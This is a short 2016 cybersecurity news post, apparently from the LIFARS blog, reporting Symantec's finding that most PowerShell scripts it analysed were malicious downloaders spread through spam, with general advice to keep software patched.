December 12, 2016 by

Microsoft’s PowerShell is Being Abused by Malware Authors

Microsoft Powershell, the software giant’s prominent scripting language that is now the default shell in the ever-popular Windows operating system is being used by cybercriminals to spread malware, security researchers have revealed.

Security firm Symantec has revealed that an analysis of scripts running Microsoft PowerShell saw a staggering 95.4 percent of the samples to be malicious. Malware authors are increasingly turning to the scripting language and shell platform, using its powerful flexibility to download their malware payloads, security researchers from Symantec confirmed.

PowerShell has been around for over a decade now, typically used by system administrators for daily management tasks. However, common cybercriminals and notorious larger groups are leveraging PowerShell too.

As the default shell framework, PowerShell makes for an attractive platform for malware authors to spread their malicious software. Most organizations are at risk, since they do not have extended logging enabled for the framework. Moreover, PowerShell scripts allow for payloads to be executed directly from system memory and they can also be easily obfuscated. Altogether, a favored attack tool, for cybercriminals.

Most malicious PowerShell scripts were used as downloaders, like Office macros, according to the cybersecurity firm’s researchers.

The most notable takeaways, such as the major prevailing malware families using PowerShell are:

All three of the above threats have seen their dispersal through spam emails, while Symantec added:

Over the last six months, we blocked an average of 466,028 emails with malicious JavaScript per day, and this trend is growing. Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage.

As always, users are advised to update the latest version of PowerShell and keep their security software programs up-to-date with the latest updates and patches. Caution whilst opening attachment is recommended, especially when being presented with scripts or files from an untrusted source.

Image credit: Pixabay.

About the author

Image of Author

LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagements experience while providing a strategic and integrated array of services to minimum risk and disruption while protecting your brand.

Related articles

Meltdown, Spectre Bugs Bring More Grief to Microsoft, AMD Users

Microsoft has temporarily paused issuing patches to the Metldown and Spectre vulnerabilities for AMD...

Read more arrow_forward

47 Million Emails/Day: Necurs Botnet Launches Massive Ransomware Campaign

A cybersecurity firm has revealed it has blocked as many as 47 million emails per day spewed by the...

Read more arrow_forward

Cybercriminals Spoof Millions of Printers, Scanners to Spread Malware

Security researchers have discovered cybercriminals spoofing millions of scanners to launch attacks...

Read more arrow_forward